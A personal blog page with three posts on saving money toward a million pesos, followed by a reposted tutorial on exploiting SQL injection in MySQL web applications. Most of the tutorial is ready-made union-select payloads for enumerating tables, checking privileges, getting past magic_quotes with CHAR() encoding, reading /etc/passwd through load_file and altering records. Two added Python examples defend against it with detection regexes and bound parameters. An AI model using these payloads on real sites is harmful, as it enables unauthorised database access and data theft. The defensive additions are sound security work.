Wednesday, February 20, 2013

Why I Want To Be a Millionaire (and you might too)

This may sound weird but the truth is I never placed money as a main priority in my entire life…ever. But this does not mean that I spend it like there is no tomorrow. Saving up for the "rainy" day has always been bestowed to me by my parents ever since I was a child so much that it almost became second nature to me. From piggy banks to bank accounts, having that extra firepower when life throws almost everything at you at the same time does help me sleep well at night which is really, really priceless.

I always believed somehow that money would eventually come along as long as you excel in whatever you do. Well, in reality, this is partially true but may not exactly guarantee being a millionaire in the very near future. What I learned is that you have to make money making/saving a priority at least for the next couple of years until you reach that goal of having that label on top of your head. I know this does not sound right but it worked in my case and hopefully it will for you also.

If I could list all of them down, the following are probably my best reasons:

1. Peace of mind knowing my aging mother will have some funds for her hospital bills once her health starts to eventually deteriorate in the very near future.

2. Financial freedom (aka peace of mind, at least for now).

3. A clear mind, knowing that I could use my upcoming income from my day job as a security guy to finance small projects that have been bugging me on top of my head for quite some time now.

4. Lastly, I want to prove to all future cyber criminals out there that you can earn a decent living without resorting to a life of crime if you just get rid of that "get rich quick" attitude. Always keep in mind that Rome was not built in a day, so if you have the patience to learn the latest security exploits, you most likely also have the patience to be a millionaire!

Sunday, February 17, 2013

The Value of Enjoying Your Job and Saving Money

I have been somewhat labelled in our industry as a "hopper", or someone who just does not stay very long at a particular job or company and finds a new one as soon as something seemingly better comes along. As they say, it is human nature to have that "the grass is always greener on the other side of the hill" mentality when no longer content with your present state. While doing this has provided me lots of hands-on work experience in the I.T. industry, it does not deny the fact that I was also escaping the realities of the corporate world whenever I was no longer happy with higher management decisions. Office politics, internal squabbling, etc. will always be there in whatever company I move to, and it just hit me one day that finding the answer deep inside is the only way to solve my personal career issues. Had I realized this early on, then most likely I would have been a lot more financially stable already than I am now. Ah, regrets, regrets, but that is all in the past now, as what matters is what lies ahead, and trying to learn as much as possible from past experiences will keep you from repeating them in the near future and thus save you extra time/money.

Understanding the nature of your work environment can do wonders for your savings, as it simply decreases your stress by a wide margin, such that your spending instincts won't be as strong once payday arrives. While we need occasional instant gratification every now and then, keeping it down to a minimal level as a habit can do wonders towards that goal of millionaire status that you want. Always remember, an item's price tag does not determine its overall value to you once you have bought it, so keep that in mind.

Wednesday, February 13, 2013

Do You Really Want To Be A Millionaire?

When asked this seemingly simple question, most people would obviously answer an overwhelming "yes", but those few people who really know the true meaning and implications of being one might answer in a less enthusiastic manner. Especially if you are like me, who has to bend over backwards each passing day just to save up each hard-earned peso after it has been chopped away by internal revenue's 30% tax deduction. So how does one become one? I am not a financial "expert" in any way but I am just sharing whatever worked for me and continues to do so. Be aware that the path is no easy one, so make sure your answer to the previous question is a loud "yes at all legal means!" or something like that :)

One more thing to keep in mind also is that there is a big difference between being rich and being a millionaire especially depending on the currency of the country where you are at now. I’m from the Philippines and so our currency is Peso and 1 million pesos is equal to just around 25,000 US dollars. :)

So what is the best way to start? How about self assessment? How much have you saved up until now and how long did that take you? If your target year is within the next 5 years, then you better earn at least 20% of your target this year or at least somewhere near that. Failing to do so might result in losing your momentum in the following years since the target amount will become unrealistic to you by then.

So start saving your monthly salary from your day job and get as close to that target 20% this year!

Friday, January 11, 2013

Real World SQL Injection

Exploiting Web 2.0, Real World SQL Injection

0x000 - NULL
0x001 - Introduction
0x010 - Global Exploiting
0x011 - Exploiting The Bug
0x101 - Conclusion
0x110 - Helpful links


0x001 - Introduction :

SQL injection is a technique that allows you to exploit a web vulnerability to extract the content of the database and show it to the injector, thanks to an error while the request ....


0x010 - Global Exploiting :

Exploiting The SQL Injection Vulnerability

To exploit this vulnerability you have to meet the following conditions :

1- Null the query

2- Get the number of columns

-> To null the query it is enough to add something that does not exist in the database

-> To find the number of columns in MySQL you can use the following in the query : '+order+by+x--

x is the number of columns you are trying to guess :

=> if the page shows normally with no errors, this means that the number you entered is < than the real number of columns

=> if the page shows an error, this means that the number you entered is > than the real number of columns

Now you are wondering how to know the real number of columns. I'll tell you : it's the number right before the 1st error !

Note : Don't forget the comment : ( -- or /* or # or a null byte )

I hope it's pretty clear

so build the query like this

=> ' union select 1,2,3--

1,2,3 -> number of columns

in our example the number of columns is 19 :

'+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

xx - now let's get basic info about this database

=> Database Name

-> you can get the name of the db with 'database()'

' union select 1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17,18,19--

The database is called "fluff2"

=> Database Version

-> you can get the version of the db with 'version()'

' union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19--

The database version is "5"

=> Database Username

-> you can get the username of the db with 'user()'

' union select 1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18,19--

The database username is "muu"

=> Database Location

-> you can get the location of the db with '@@datadir'

' union select 1,2,3,4,5,6,7,@@datadir,9,10,11,12,13,14,15,16,17,18,19--

The database is located in "/var/lib/mysql/"

xxx - Get your privileges !

Let's try any privs (select, update, file etc...)

' union select 1,2,3,4,5,6,7,update_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user--

' union select 1,2,3,4,5,6,7,file_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user--

' union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user--

it seems that nothing is allowed !

well, since our user is muu, let's try to see our privs where user = muu

' union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)--

we can see we got full privileges now :P

0x011 - Exploiting The Bug :

let's now try to get the database content and use it !

=> uploading a file !

to upload any file, magic_quotes has to be set 'OFF'

-> what the fuck is magic_quotes ?

Magic_Quotes is a feature in PHP made to help coders and developers avoid falling into SQL injection vulnerabilities, and it's going to be removed in PHP6 !

Well, in Our FaceBook Magic_Quotes are set 'ON', so we cannot use into outfile to upload a file !

=> Getting DB content :

to read the content of a specific column, you must use the following

' union select 1,2,3,4,5,6,7,column,9,10,11,12,13,14,15,16,17,18,19 from table--

column -> the column you want to read

table -> the table where the wanted column is located

Now you wonder : you don't know the column names or table names, so what do you do ?

Since the database is V5, it has to have information_schema inside

so let's exploit information_schema :

-> Get Tables :

' union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--

As you see, it's showing the name of the table | database

but only one table appears ! what to do to show the rest ?

change concat into group_concat ; the exploit looks like this :

' union select 1,2,3,4,5,6,7,group_concat(table_name,0x7c,table_schema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--

well, it's showing some more

but this is not all

let's try something different !

add LIMIT 1 OFFSET 44-- after our current exploit

' union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables LIMIT 1 OFFSET 44--

and change the '44' to another number and it will show another table

Now you wonder how to get table columns ?!

Alright, you can get table columns from information_schema.columns like the following

from+information_schema.columns+where+table_name="table_name"

so in our exploit it will become like this :

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.columns where table_name='info'--

since Magic_Quotes are set to 'ON' we must convert the table name to ASCII

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.columns where table_name=CHAR(105, 110, 102, 111)--

Bingo ! this is one column

to show the others use 'limit 1 offset'

You can see the content of any column =)

For now let's try to look for a specific table or specific column !

you can get it using

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like time--

Note : time is the column we want to look for

and don't forget to change the column to ASCII because magic_quotes is on

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)--

To see other info about the column, concatenate 'column_name' with table_schema and table_name

' union select 1,2,3,4,5,6,7,concat(column_name,0x7c,table_schema,0x7c,table_name),9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)--

update fluff2 set time=alphanix where

Bingo ! You can see column, db, table, and look for any column,

pretty easy, isn't it ?

=> Reading Any File content :

since we have file loading privileges, we can load any file on the server (must have the right permissions) and show it !

' union select 1,2,3,4,5,6,7,load_file(/etc/passwd),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=muu--

and convert to ascii

' union select 1,2,3,4,5,6,7,load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)--

here we loaded the '/etc/passwd' file ; I would like to get the shadow but I don't have root privileges

=> Updating the database :

since we got the update privilege we can change the value of any field in the db !

the update query is like the following :

' update table_name set column_name='new value' where column_name='value' where user=muu

never forget to convert to ascii xD
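Added example, not part of the original post: a log scanner that flags the request patterns this walkthrough produces (ORDER BY probing, UNION SELECT, information_schema and mysql.user enumeration, load_file, CHAR()-encoded strings). The signature names, the log format, /item.php and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed signatures, one per technique named in the walkthrough above.
SIGNATURES = {
    "column_count_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\b|\bmysql\.user\b", re.I),
    "file_read_or_write": re.compile(r"\bload_file\s*\(|\binto\s+(out|dump)file\b", re.I),
    "char_encoded_string": re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)+\s*\)", re.I),
    "fingerprinting": re.compile(r"@@datadir|\b(version|database|user)\s*\(\s*\)", re.I),
}

def normalise(raw):
    """URL-decode twice (double encoding), drop inline comments, collapse whitespace."""
    text = unquote_plus(unquote_plus(raw))
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text)

def classify(request_line):
    """Return the sorted names of the signatures matched by one request line."""
    text = normalise(request_line)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan(log_lines):
    """Map client address -> set of techniques seen, for clients with any hit."""
    findings = {}
    for line in log_lines:
        client, _, rest = line.partition(" ")
        hits = classify(rest)
        if hits:
            findings.setdefault(client, set()).update(hits)
    return findings

# Constructed access-log lines (documentation addresses, hypothetical pages).
SAMPLE_LOG = [
    '198.51.100.7 "GET /item.php?id=1 HTTP/1.1" 200',
    '203.0.113.9 "GET /item.php?id=1%27+order+by+20-- HTTP/1.1" 500',
    '203.0.113.9 "GET /item.php?id=x%27+UNION/**/SELECT+1,version(),3-- HTTP/1.1" 200',
    '203.0.113.9 "GET /item.php?id=x%27+union+select+1,column_name,3+from+'
    'information_schema.columns+where+table_name=CHAR(105,110,102,111)-- HTTP/1.1" 200',
    '198.51.100.7 "GET /search.php?q=order+by+mail HTTP/1.1" 200',
]

if __name__ == "__main__":
    for client, techniques in scan(SAMPLE_LOG).items():
        print(client, sorted(techniques))
```

A client that trips several of these signatures in sequence, starting with 500 responses from ORDER BY probing, is a stronger signal than any single match.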


0x101 - Conclusion :

60% of scripts are vulnerable to SQL injection, and it's really important to learn how to protect ourselves from it in order to write more secure scripts
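Added example, not part of the original post: why quote escaping of the magic_quotes kind does not stop the CHAR()-encoded input used above, shown beside a bound-parameter lookup that does. SQLite stands in for MySQL so the block runs offline; the tables, data, function names and crafted input are constructed.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory database standing in for the site's backend."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER, title TEXT);
        CREATE TABLE accounts (name TEXT, secret TEXT);
        INSERT INTO articles VALUES (1, 'hello world');
        INSERT INTO accounts VALUES ('muu', 's3cret-constructed');
    """)
    return db

def quote_escape(value):
    """Rough stand-in for magic_quotes: backslash-escape quotes and backslashes."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def lookup_concat(db, article_id):
    """Vulnerable: the input is escaped, then pasted into a numeric context."""
    sql = "SELECT id, title FROM articles WHERE id = " + quote_escape(article_id)
    return db.execute(sql).fetchall()

def lookup_bound(db, article_id):
    """Hardened: validate the type, then bind the value as a parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", article_id):
        return []
    sql = "SELECT id, title FROM articles WHERE id = ?"
    return db.execute(sql, (int(article_id),)).fetchall()

# Constructed input: it contains no quote characters, so escaping changes nothing
# and char(109,117,117) still evaluates to the string 'muu' inside the query.
CRAFTED = "0 UNION SELECT name, secret FROM accounts WHERE name = char(109,117,117)"

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_concat(db, CRAFTED))  # leaks the accounts row
    print("bound:       ", lookup_bound(db, CRAFTED))   # rejected, returns []
    print("bound, id=1: ", lookup_bound(db, "1"))
```

The same rule applies in PHP: use prepared statements (PDO or mysqli) with bound parameters, and give the application's database account no FILE or UPDATE rights it does not need.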

0x110 - Additional Useful Link :
